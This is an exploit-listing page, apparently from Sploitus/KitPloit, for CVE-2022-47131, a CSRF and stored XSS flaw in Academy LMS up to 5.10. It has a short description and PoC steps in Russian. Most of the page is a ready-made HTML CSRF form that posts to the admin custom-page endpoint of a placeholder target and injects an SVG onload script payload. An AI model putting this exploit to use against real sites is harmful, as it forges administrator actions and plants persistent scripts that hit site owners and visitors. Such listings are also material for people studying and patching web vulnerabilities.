Sploitus

Exploit for CVE-2022-47131

kitploit · 2026-09-02

Exploit Code

MARKDOWN34 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-OPENXP-RESEARCH-CVE-2022-47131
# CVE-2022-47131

Academy LMS <= 5.10 CSRF / XSS

# Описание

Academy LMS — это приложение, где люди могут создавать и рекламировать курсы. Функция добавления новой страницы уязвима к CSRF, так как отсутствует токен, который предотвращал бы эту атаку. Кроме того, эта страница может использоваться для загрузки сохранённой XSS-нагрузки.

# Доказательство концепции (POC)

Первый шаг нашего доказательства концепции — аутентификация на платформе под администратором.

После этого просто перейдите на страницу, содержащую код для эксплуатации уязвимости. Обратите внимание, что на домашней странице сайта появится новая кнопка, перенаправляющая на XSS-страницу.

Код, используемый в эксплойте:

root@kitploit:~
    
    
    <html>
       <body>
       <script>history.pushState('', '', '/')</script>
         <form action="https://target.com/admin/custom_page/add" method="POST">
           <input type="hidden" name="page&#95;title" value="CSRF&#32;XSS" />
           <input type="hidden" name="page&#95;content" value="&quot;&gt;&lt;svg&#32;onload&#61;alert&#40;document&#46;domain&#41;&#59;&gt ;" />
           <input type="hidden" name="files" value="" />
           <input type="hidden" name="button&#95;title" value="CSRF&#32;XSS" />
           <input type="hidden" name="button&#95;position" value="header" />
           <input type="hidden" name="page&#95;url" value="xss" />
           <input type="submit" value="Submit request" />
         </form>
       </body>
    </html>